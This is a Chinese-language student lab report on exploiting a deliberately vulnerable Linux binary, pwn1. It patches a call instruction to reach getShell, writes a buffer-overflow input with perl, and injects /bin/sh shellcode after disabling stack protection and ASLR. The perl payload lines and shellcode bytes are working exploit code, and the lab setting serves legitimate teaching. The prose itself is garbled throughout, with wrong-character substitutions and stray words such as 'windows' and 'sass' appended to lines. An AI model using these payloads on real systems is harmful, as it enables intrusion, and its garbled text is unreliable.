2018-2019 20165226 网络对抗 Exp1 PC平台逆向破解

时间 2019-12-08

原文原文链接

2018-2019 20165226 网络对抗 Exp1 PC平台逆向破解

1、逆向及Bof基础实践说明

1.1 实践目标
本次实践的对象是一个名为pwn1的linux可执行文件。shell

该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。windows

该程序同时包含另外一个代码片断，getShell，会返回一个可用Shell。正常状况下这个代码是不会被运行的。咱们实践的目标就是想办法运行这个代码片断。咱们将学习两种方法运行这个代码片断，而后学习如何注入运行任何Shellcode。sass

三个实践内容以下：

手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。

利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。

注入一个本身制做的shellcode并运行这段shellcode。

这几种思路，基本表明现实状况中的攻击目标:

运行本来不可访问的代码片断

强行修改程序执行流

以及注入运行任意代码。

1.2 基础知识网络

NOP, JNE, JE, JMP, CMP汇编指令的机器码
- NOP：NOP指令即“空指令”。执行到NOP指令时，CPU什么也不作，仅仅当作一个指令执行过去并继续执行NOP后面的一条指令。（机器码：90）
- JNE：条件转移指令，若是不相等则跳转。（机器码：75）
- JE：条件转移指令，若是相等则跳转。（机器码：74）
- JMP：无条件转移指令。段内直接短转Jmp short（机器码：EB）段内直接近转移Jmp near（机器码：E9）段内间接转移 Jmp word（机器码：FF）段间直接(远)转移Jmp far（机器码：EA）
- CMP：比较指令，功能至关于减法指令，只是对操做数之间运算比较，不保存结果。cmp指令执行后，将对标志寄存器产生影响。其余相关指令经过识别这些被影响的标志寄存器位来得知比较结果。
Linux基本操做
- objdump -d：从objfile中反汇编那些特定指令机器码的section。
- perl -e：后面紧跟单引号括起来的字符串，表示在命令行要执行的命令。
- xxd：为给定的标准输入或者文件作一次十六进制的输出，它也能够将十六进制输出转换为原来的二进制格式。
- ps -ef：显示全部进程，并显示每一个进程的UID,PPIP,C与STIME栏位。
- |：管道，将前者的输出做为后者的输入。
- >：输入输出重定向符，将前者输出的内容输入到后者中。
咱们经过输入chmod +x pwn1将pwn1文件加高亮

返回目录dom

2、直接修改程序机器指令，改变程序执行流程

知识要求：Call指令，EIP寄存器，指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具
学习目标：理解可执行文件与机器指令
进阶：掌握ELF文件格式，掌握动态技术函数

使用objdump -d pwn1将pwn1反汇编，获得如下代码

能够看出80484b5: e8 d7 ff ff ff call 8048491 <foo>这条汇编指令，在main函数中调用位于地址8048491处的foo函数，e8表示“call”，即跳转。工具

若是咱们想让函数调用getShell，只须要修改d7 ff ff ff便可。根据foo函数与getShell地址的偏移量，咱们计算出应该改成c3 ff ff ff。学习

修改具体以下：spa

vi pwn1进入命令模式
输入:%!xxd将显示模式切换为十六进制
在底行模式输入/e8d7定位须要修改的地方，并确认
进入插入模式，修改d7为c3
输入:%!xxd -r将十六进制转换为原格式

使用:wq！保存并退出
反汇编查看修改后的代码，发现call指令正确调用getShell：

返回目录

3、经过构造输入参数，形成BOF攻击，改变程序执行流

知识要求：堆栈结构，返回地址学习目标：理解攻击缓冲区的结果，掌握返回地址的获取进阶：掌握ELF文件格式，掌握动态技术

反汇编，具体操做参考上一步骤，此处再也不赘述
该可执行文件正常运行是调用函数foo，这个函数有Buffer overflow漏洞。读入字符串时，系统只预留了必定字节的缓冲区，超出部分会形成溢出，咱们的目标是覆盖返回地址。尝试发现，当输入为如下字符时已经发生段错误，产生溢出：

使用gdb进行调试：

由此可得eip的值为ASCII的5，即输入字符串的“5”的部分发生溢出，咱们能够尝试将5的部分换成12345678进一步确认：

由此看来1234覆盖了堆栈的返回地址。所以，咱们能够尝试将这四个字符替换成getShell的内存地址并输给20165226pwn2,20165226pwn2就会运行getshell。

反汇编查看getshell的内存地址：

由此可知应输入11111111222222223333333344444444\x7d\x84\x04\x08

使用perl命令构造文件perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
使用十六进制查看指令xxd查看input文件。\0a表示换行
将input的输入经过|管道符，做为20165226pwn2的输入

返回目录

4、注入Shellcode并执行

hellcode就是一段机器指令（code）

一般这段机器指令的目的是为获取一个交互式的shell（像linux的shell或相似windows下的cmd.exe），因此这段机器指令被称为shellcode。

在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。

首先使用apt-get install execstack安装execstack
修改一下设置

root@kali:~/20165226/exp1# execstack -s 20165226pwn3
root@kali:~/20165226/exp1# execstack -q 20165226pwn3
X 20165226pwn3
root@kali:~/20165226/exp1# more /proc/sys/kernel/randomize_va_space
2
root@kali:~/20165226/exp1#  echo "0" > /proc/sys/kernel/randomize_va_space
root@kali:~/20165226/exp1# more /proc/sys/kernel/randomize_va_space
0

采用RNS方法攻击buf（retaddr+nop+shellcode）perl -e 'print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"' > input_shellcode
在第一个终端用(cat input_shellcode;cat) | ./20165226pwn3注入攻击，回车后保持这个终端不动，打开另外一个终端
另外一个终端
- ps -df |grep 20165226pwn3查看其进程号为3292
- gdb调试进程
  
  启动gdb，attach 3292调试此进程
  经过设置断点disassemble foo来查看注入buf的内存地址
  使用break *0x080484ae设置断点，并输入c（continue）继续运行。在20165226pwn3进程正在运行的终端敲回车，使其继续执行。再返回调试终端，使用info r esp查找地址。
  使用x/16x 0xffffd2ec查看其存放内容，看到了01020304，就是返回地址的位置。根据咱们构造的input_shellcode可知，shellcode就在其后，因此地址是0xffffd2f0。
回到第一个终端
- 输入命令perl -e 'print "A" x 32;print "\xf0\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
- 再用(cat input_shellcode;cat) | ./20165226pwn3 命令次执行程序，攻击成功！

返回目录

5、问题与思考

问题1：ebd7找不到
问题1解决方案：输入/e8 d7（注意中间空格）
问题2：在另外一个终端中没法查看显示20165226pwn3这个进程的进程号
问题2解决方案：
仔细比对步骤，发现写好的代码未成功经过管道方式对文件中foo函数进行覆盖，从新输入(cat input_shellcode;cat) | ./pwn2
问题3：出现如下状况
问题3解决方案；两个终端分别运行时将20165226pwn3文件提早结束运行了，当第一次使用cat语句执行后应该保持不动。
返回目录